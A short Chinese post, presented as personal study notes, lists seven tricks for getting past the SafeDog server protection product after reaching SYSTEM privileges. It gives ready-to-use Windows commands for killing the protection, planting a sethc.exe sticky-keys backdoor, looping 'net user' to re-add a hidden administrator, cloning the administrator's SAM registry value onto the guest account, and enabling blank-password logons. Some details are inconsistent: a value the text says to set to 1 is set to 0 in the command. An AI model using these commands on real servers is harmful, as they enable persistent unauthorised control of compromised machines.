提權繞過安全狗加賬戶的種種思路。

注：個人學習總結心得。

提權時候拿到system權限后，安全狗就如同渣渣，不是么？

打狗棍法一：

system權限下直接執(zhí)行K狗工具，k掉安全狗的防御，

打狗棍法二：

上傳shift后門，（有可能被攔截）

直接復制

copy C:\sethc.exe C:\windows\system32\sethc.exe

copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe

或者注冊表劫持，修改壓縮包里面注冊表里面文件的路徑

打狗棍法三：

在net1沒禁用的情況下，

安全狗的攔截加賬戶，是每兩秒檢測一次保護的用戶組，檢測到新添加的就會刪除，我們可以利用的就是他這個兩秒時間，

利用for循環(huán)來不斷的加帳號，一直加，他一直刪，我們能進入服務器，不是么？執(zhí)行100次加賬戶的命令，

for /l %%i in (1,1,100) do @net user asphxg asphxg /add&@net localgroup administrators asphxg /add

打狗棍法四：

首先，用guest，演示一下，具體操作是通過注冊表，篡改sam下用戶的F值，使其達到管理權限.

首先，你必須有可以提權的exp,使自己達到system權限,大家都知道,administrator對應值是1F4,GUEST是1F5，如果有例外，下面會講到。

下面是步驟:

1.使用net1 user guset 1 ,將guest密碼重置為1，無需過問是guest否禁用

2.執(zhí)行：reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"

導出administrator的注冊表值到某路徑,修改內容，將"V"值刪除，只留F值,將1F4修改為1F5,保存。

3.執(zhí)行regedit /s C:\RECYCLER\1.reg 導入注冊表

就可以使用，guest 密碼 1登陸了。

安全狗說：在賬戶保護全開的情況下，如果不能更改密碼呢？！

打狗棍法五：

如果真的不能更改密碼呢？則使用vbs查看iis用戶密碼，再使用

reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用戶名" "C:\2.reg"

查看其對應值，再重復以上第二步和第三步，使用查看到的明文密碼登陸

安全狗又提示：

如果不允許修改密碼，iis用戶是禁止登陸遠程桌面的呢？

打狗棍法六：

對啊，我們該怎么辦？繼續(xù)聽我說，大家都知道guest是空密碼，那我們就使用空密碼登陸。

執(zhí)行

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f

修改limitblankpassworduse值為1，重復上面第二第三步驟，繼續(xù)登陸。

打狗棍法七：

查詢在線用戶query user

直接修改管理員密碼~

oh ye~

注：個人學習總結心得。

---------------------